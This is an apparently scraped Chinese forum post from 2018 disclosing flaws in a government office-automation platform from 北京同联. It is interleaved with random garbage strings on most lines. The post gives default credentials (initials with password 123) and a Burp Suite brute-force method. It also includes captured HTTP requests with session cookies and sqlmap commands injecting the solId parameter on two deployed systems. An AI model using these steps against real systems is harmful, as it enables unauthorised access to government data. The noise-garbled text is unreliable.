|
0 H/ y. Q! O. W" w l
$ Z8 k- C/ X7 U6 C* w
4 }3 T4 F+ ?* M: C, T3 ]' Y& J6 b. o; N% [/ R3 R7 A
平台简介:9 U2 c4 X/ L" j- W! g
3 D# }7 k1 I5 p. l
4 k# R5 }2 U( ~$ |* L( J$ ? ! ~# m( S! M w9 F& ?4 z) m
8 O1 o j& K( }: \. b8 N& X$ g0 W: D2 B' v: j7 H7 i" _# e
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
3 T: i8 A8 _+ M) }
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
% l% E R3 J R8 l7 m9 Y ]
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
" f' j4 H0 M s" G ! b7 O( I1 C# X9 l
; C8 ~5 `+ b9 o. Q) x
& V- t4 J% L/ H+ h8 U- M3 X
% a, b/ S4 t/ W
0 _" L' I1 d5 W& e* a$ w 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:1 K; E8 W" S0 ?/ T( c# O+ D% `
|1 M3 n( L) ]9 n3 r+ [ ?" F) D: ]
2 i: Q. l: D* I
1 ^: r. z( k. t- K
7 D. h* i$ x: ~) a http://1.1.1.1:7197/cap-aco/#(案例2-)4 ~/ e/ [! B% {
3 \* ~1 i2 P2 v U7 s
`. Y" U0 I+ K# j' `8 c# k
http://www.XXOO.com (案例1-官网网站)
* }4 q% @+ m. a+ v' i" Y( T
1 X4 a4 N: N' S5 E
- s; A. P( i% b. o , ]9 e4 q* [0 M9 T
) D- j. r. @1 x. P" {
; ^4 ^+ l) C9 r 漏洞详情:! S3 e/ \; i* |
! s1 Z* A5 ~' U
) {- S% q: t! U7 s 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试' H/ L+ D9 ~" I8 B M7 S
7 H" i+ \$ `2 r) ~
( o B. P4 B1 ` 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:+ v6 h2 `; f% } E1 m4 Q
3 ?6 X" v0 L! E/ o' [
* b* V# x% y' e' i: j9 Y
# R7 m% j& e: r" t% Z& v* N 7 R+ c! y0 Q' X$ a
7 S$ ^- H4 u x! O! Z3 y 
4 U! u# I3 [: a% X
A6 [/ E8 m' p1 y3 D
- E( h" ^2 ] i2 P. p- K( O5 t status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
% L0 x) h! A( [0 a/ k5 E# O/ a . Q0 \$ b# p- b# `& ?
5 _" t2 V7 U; M4 P/ M0 F& Q0 i
1、案例1-官方网站
, |$ q1 a* c9 W5 d
0 M* X7 O+ Q1 D: P+ x8 S7 v& ^) K- ?& [. m
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.11 d s/ H% H$ o. q. z Q
g' |8 a4 r7 f
8 r6 O% T" W; ^) y6 N9 o" q$ O
Host: www.XXOO.com
- K4 F8 M% ~2 V& R
" @2 S; H4 \( V$ d
5 N& q/ \6 V4 T' g Proxy-Connection: Keep-Alive' p/ n7 s4 }$ R0 G' z
: S. B. Y# |. v3 h
) {+ C2 G+ B Z% N9 z! W$ Z
Accept: application/json, text/javascript, */*; q=0.01
5 Q6 X9 D. Y% @( Y: P" H 1 {+ l" i7 E* L1 v* s2 S6 S
* p Z' ^( Q& S8 O6 W! g' s! W% X
Accept-Language: zh-CN3 F* c. {) W9 s- _4 n' A# e. j; N
- i; r+ R, J5 R, B: {) v( j/ ~% m! R. k; {2 a. R
Content-Type: application/json
( h h1 } I5 _; I2 A . M* M1 K+ {: P4 M9 `5 l- R1 _$ F
* J4 h F6 h6 Y" A. `" }3 O4 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko( c+ m' J2 T, }( G0 ]4 N' l& v6 \
2 z: G! l: R; e# {! \- s d8 ~8 F
+ K0 i) U k+ D% @# f, X8 l X-Requested-With: XMLHttpRequest/ {. J: E1 S: }) H6 D# h
& c6 ` u7 S" `+ l) f+ V1 Y
@% h Q% `, l7 t' G$ v3 l Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002/ f1 [4 m L% P' J
1 e6 o8 A0 Y! H9 B" n) E
9 Q( f! O* v9 p0 j2 i& y! m$ c Accept-Encoding: gzip, deflate, sdch4 O1 B. n% Q' ]5 u. x8 V9 }1 X+ e
% O! R, ^& a' h; u5 u4 H
9 F" o. z) d2 U Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e& l3 J* {8 v) c. G2 N/ d0 w6 m8 q
- }+ x3 g. j9 T0 ]( A2 A% j
8 L9 W/ T' W* i# _7 x 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:" j2 b& Y, V% [' i
- H2 q! U! M# ?! s* K
/ ]' P/ ]3 H0 M  9 K( `' b- i- Q9 ^5 k3 K- p
: ]( j: `/ g/ T9 a. }" W! C x$ I
- z" V, A" i; e; f1 d3 U 
- t2 Z+ U" z& _5 D7 y
, ^! M! n8 N" {" D% J
6 j G! @& D7 w
- c3 ^# k' Z5 n9 J" s3 p9 _ C & T, Z/ B7 D. v
, J, H% `) ^0 b' t2 ], P- ^ , T) V0 j" A4 @+ Q0 f4 a4 ~) s
7 K! X' } `6 l2 ]1 m3 f4 h; h6 A$ p4 @5 `4 k1 F
7 z; i8 q* J" n v" E0 O
0 [/ H5 h4 u. ?( g
( ?$ k; |) ~3 }- c& Q 2、案例2-某天河云平台
/ P3 m/ q u& t( ^7 c& ~5 j4 s
" L6 \( Q* q5 S, [6 w3 ~! i# M
( w( O2 Z, _! p; l8 X7 y) ] GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1( A3 d( W% [, [ d8 t1 t
0 D$ m- _8 }0 d3 ~7 Z2 v" c/ }& |/ D o4 R
Host: 1.1.1.:7197
6 h1 n! L2 I+ u4 q. U
2 m y, ]/ I" K5 N; o# u7 M! M( @8 C( j" W9 M4 ^+ S R! H9 J9 o
Accept: application/json, text/javascript, */*; q=0.013 q" e; O C" H3 H
: d, c6 E7 ]. U& |2 E9 s$ g
2 |1 E6 @0 s# Y2 n. ~
X-Requested-With: XMLHttpRequest
4 f( d+ |7 J/ Q: g+ V
$ R: d9 F5 }2 ]/ a4 J7 k+ Z
6 x7 n4 c6 }; T User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.06 z( f6 t: C" K
7 O8 A3 t% ~/ X, i+ J1 j: k. S1 u) b2 M, c1 A k O
Content-Type: application/json- d/ W; W2 }7 l3 u. N
/ a- i. x6 o4 ~8 [) E {5 l* u. r. ]; {7 w% q
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008. M. d0 l' o2 v1 U6 n* O' w
: z$ I2 P& i6 t$ ]7 D2 ~ b5 o6 r- z/ J5 I) C* o
Accept-Language: zh-CN,zh;q=0.8
; b9 \- Q' c& i# G6 w + Q3 [% a& \3 D0 W
9 h. ~) g. ~) ]5 S
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1) Z9 c8 r$ B5 {& A5 x
) P6 z, c, E9 U7 h0 V( J
) U; Z( h. ~7 C! W6 { Connection: close
$ e8 U9 c0 o: i( l& ?" x, ?, w ; Z* u) Y" } p2 S
0 o7 R: _; R& | _
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:$ z# _8 ?+ L9 b8 g% b- c
% ^3 y0 k, U% L8 O. y1 k9 ~. e4 A
1 ~6 r. |' G! u- a" c; Z" L* C3 o- A
0 I, Q- P E' {; j0 a
/ I$ T6 R/ S W. J# ]( O9 y+ H0 E# L& U# ^$ b6 F+ J8 |
% ~ l, t, I0 N* y/ N- V
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对